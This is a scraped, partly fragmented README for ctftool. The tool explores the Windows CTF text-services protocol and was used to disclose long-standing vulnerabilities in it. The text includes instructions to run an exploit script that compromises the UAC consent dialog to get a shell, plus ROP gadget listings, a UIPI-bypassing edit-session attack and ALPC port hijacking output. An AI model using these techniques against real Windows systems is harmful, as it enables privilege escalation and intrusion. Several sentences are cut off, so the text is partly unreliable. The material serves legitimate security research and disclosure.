ctftool, an interactive command line tool to experiment with CTF, a little-known protocol used on Windows to implement Text Services. This might be useful for studying Windows internals, debugging complex issues with Text Input Processors and analyzing Windows security.
ctftoolfor automating interaction with CTF clients or servers, or perform simple fuzzing.
ctftool has been tested on Windows 7, Windows 8 and Windows 10. Both 32-bit and x64 versions are supported, but x64 has been tested more extensively.
There is online help for most commands, simply type
help to see a list of commands, and
help <command> to see detailed help for a particular command.
The first thing you will want to do is connect to a session, and see which clients are connected.
$ ./ctftool.exe An interactive ctf exploration tool by @taviso. Type "help" for available commands. Most commands require a connection, see "help connect". ctf> help Type `help <command>` for help with a specific command. Any line beginning with # is considered a comment. help - List available commands. exit - Exit the shell. connect - Connect to CTF ALPC Port. info - Query server informaiton. scan - Enumerate connected clients. callstub - Ask a client to invoke a function. createstub - Ask a client to instantiate CLSID. hijack - Attempt to hijack an ALPC server path. sendinput - Send keystrokes to thread. setarg - Marshal a parameter. getarg - Unmarshal a parameter. wait - Wait for a process and set it as the default thread. thread - Set the default thread. sleep - Sleep for specified milliseconds. forget - Forget all known stubs. stack - Print the last leaked stack ptr. marshal - Send command with marshalled parameters. proxy - Send command with proxy parameters. call - Send command without appended data. window - Create and register a message window. patch - Patch a marshalled parameter. module - Print the base address of a module. module64 - Print the base address of a 64bit module. editarg - Change the type of a marshalled parameter. symbol - Lookup a symbol offset from ImageBase. set - Change or dump various ctftool parameters. show - Show the value of special variables you can use. lock - Lock the workstation, switch to Winlogon desktop. repeat - Repeat a command multiple times. run - Run a command. script - Source a script file. print - Print a string. consent - Invoke the UAC consent dialog. reg - Lookup a DWORD in the registry. gadget - Find the offset of a pattern in a file. section - Lookup property of PE section. Most commands require a connection, see "help connect". ctf>
You can then experiment by sending and receiving commands to the server, or any of the connected clients.
ctf> connect The ctf server port is located at \BaseNamedObjects\msctf.serverDefault1 NtAlpcConnectPort("\BaseNamedObjects\msctf.serverDefault1") => 0 Connected to CTF [email protected]\BaseNamedObjects\msctf.serverDefault1, Handle 00000264 ctf> scan Client 0, Tid 3400 (Flags 0x08, Hwnd 00000D48, Pid 8696, explorer.exe) Client 1, Tid 7692 (Flags 0x08, Hwnd 00001E0C, Pid 8696, explorer.exe) Client 2, Tid 9424 (Flags 0x0c, Hwnd 000024D0, Pid 9344, SearchUI.exe) Client 3, Tid 12068 (Flags 0x08, Hwnd 00002F24, Pid 12156, PROCEXP64.exe) Client 4, Tid 9740 (Flags 0000, Hwnd 0000260C, Pid 3840, ctfmon.exe)
If you don't want to build it yourself, check out the releases tabI used GNU make and Visual Studio 2019 to develop
ctftool. Only 32-bit builds are supported, as this allows the tool to run on x86 and x64 Windows.
makein a developer command prompt should be enough.
git submodule update --init --recursive
The examples only work on Windows 10 x64. All platforms and versions since Windows XP are affected, but no PoC is currently implemented.This tool was used to discover many critical security problem with the CTF protocol that have existed for decades.
ctftool.exeand enter this command:
This will wait for the UAC dialog to appear, compromise it and start a shell.
An interactive ctf exploration tool by @taviso. Type "help" for available commands. Most commands require a connection, see "help connect". ctf> script .\scripts\ctf-consent-system.ctf
threadcommands, or just
ctf> script .\scripts\ctf-exploit-common-win10.ctf
You can use
dumpbin /headers /loadconfigto dump the whitelisted branch targets.
(2^8 - 1) * lendecrements.
.datasection. It needs to be part of an image so that I can predict where it will be mapped, as image randomization is per-boot on Windows.
msvcrt!_init_timegadget was the best I could find, within a few instructions it dereferences NULL without corrupting any more memory. This means we can repeat it ad infinitum.
I found two useful gadgets for adjusting registers, The first was:
And the second was:
combase!CStdProxyBuffer_CF_AddRef: mov rcx,qword ptr [rcx-38h] mov rax,qword ptr [rcx] mov rax,qword ptr [rax+8] jmp qword ptr [combase!__guard_dispatch_icall_fptr]
By combining these two gadgets with the object we formed with our write gadget, we can redirect execution to
MSCTF!CCompartmentEventSink::OnChange: mov rax,qword ptr [rcx+30h] mov rcx,qword ptr [rcx+38h] jmp qword ptr [MSCTF!_guard_dispatch_icall_fptr]
kernel32!LoadLibraryAby bouncing between them.
sxd bpeor the debugger will stop for every write!
Edit Session Attacks
Apart from memory corruption, a major vulnerability class exposed by CTF are edit session attacks. Normally, an unprivileged process (for example, low integrity) would not be permitted to send input or read data from a high privileged process. This security boundary is called UIPI, User Interface Privilege Isolation.
CTF breaks these assumptions, and allows unprivileged processes to send input to privileged processes.
There are some requirements for this attack to work, as far as I'm aware it will only work if you have a display language installed that uses an OoP TIP, out-of-process text input processor. Users with input languages that use IMEs (Chinese, Japanese, Korean, and so on) and users with a11y tools fall into this category.
Example attacks include...
\BaseNamedObjectscan create the CTF ALPC port and pretend to be the monitor.
An interactive ctf exploration tool by @taviso. Type "help" for available commands. ctf> hijack Default 1 NtAlpcCreatePort("\BaseNamedObjects\msctf.serverDefault1") => 0 00000218 NtAlpcSendWaitReceivePort("\BaseNamedObjects\msctf.serverDefault1") => 0 00000218 000000: 18 00 30 00 0a 20 00 00 00 11 00 00 44 11 00 00 ..0.. ......D... 000010: a4 86 00 00 b7 66 b8 00 00 11 00 00 44 11 00 00 .....f......D... 000020: e7 12 01 00 0c 00 00 00 80 01 02 00 20 10 d6 05 ............ ... A a message received ProcessID: 4352, SearchUI.exe ThreadId: 4420 WindowID: 00020180 NtAlpcSendWaitReceivePort("\BaseNamedObjects\msctf.serverDefault1") => 0 00000218 000000: 18 00 30 00 0a 20 00 00 ac 0f 00 00 0c 03 00 00 ..0.. .......... 000010: ec 79 00 00 fa 66 b8 00 ac 0f 00 00 0c 03 00 00 .y...f.......... 000020: 12 04 01 00 08 00 00 00 10 01 01 00 00 00 00 00 ................ A a message rec eived ProcessID: 4012, explorer.exe ThreadId: 780 WindowID: 00010110 NtAlpcSendWaitReceivePort("\BaseNamedObjects\msctf.serverDefault1") => 0 00000218 000000: 18 00 30 00 0a 20 00 00 ac 0f 00 00 0c 03 00 00 ..0.. .......... 000010: fc 8a 00 00 2a 67 b8 00 ac 0f 00 00 0c 03 00 00 ....*g.......... 000020: 12 04 01 00 08 00 00 00 10 01 01 00 58 00 00 00 ............X... A a message received ProcessID: 4012, explorer.exe ThreadId: 780 ...
ctftoolsupports connecting to non-default sessions if you want to experiment with this attack.
An interactive ctf exploration tool by @taviso. Type "help" for available commands. Most commands require a connection, see "help connect". ctf> help connect Connect to CTF ALPC Port. Usage: connect [DESKTOPNAME SESSIONID] Without any parameters, connect to the ctf monitor for the current desktop and session. All subsequent commands will use this connection for communicating with the ctf monitor. If a connection is already open, the existing connection is closed first. If DESKTOPNAME and SESSIONID are specified, a connection to ctf monitor for another desktop and session are opened, if it exists. If the specified port does not exist, wait until it does exist. This is so that you can wait for a session that hasn't started yet in a script. Examples Connect to the monitor for current desktop ctf> connect Connect to a specific desktop and session. ctf> connect Default 1 Most commands require a connection, see "help connect".
Supported Versions and Platforms
All versions of Windows since Windows XP use CTF, on all supported platforms.
While not part of the base system until XP, versions as early as Windows 98 and NT4 would use CTF if you installed Microsoft Office.
ctftool supports Windows 7 and later on x86 and x64, but earlier versions and other platforms could be supported, and contributions would be appreciated.
Microsoft doesn't document what CTF stands for, it's not explained in any of the Text Services documentation, SDK samples, symbol names, header files, or anywhere else. My theory is it's from
CTextFramework, what you might name the class in hungarian notation.
There are some websites that claim
ctfmonhas something to do with Clear Type Fonts or the Azure Collaborative Translation Framework. They're mistaken.
Update: Jake Nelson finds evidence for "Common Text Framework"
All original code is Apache 2.0, See LICENSE file for details.
The following components are imported third party projects.
GetProcAddress()for 64-bit modules from a 32-bit process. This is used in the
symbolcommand, and allows the same binary to work on x64 and x86.
Дата: 2020-02-14 11:30:08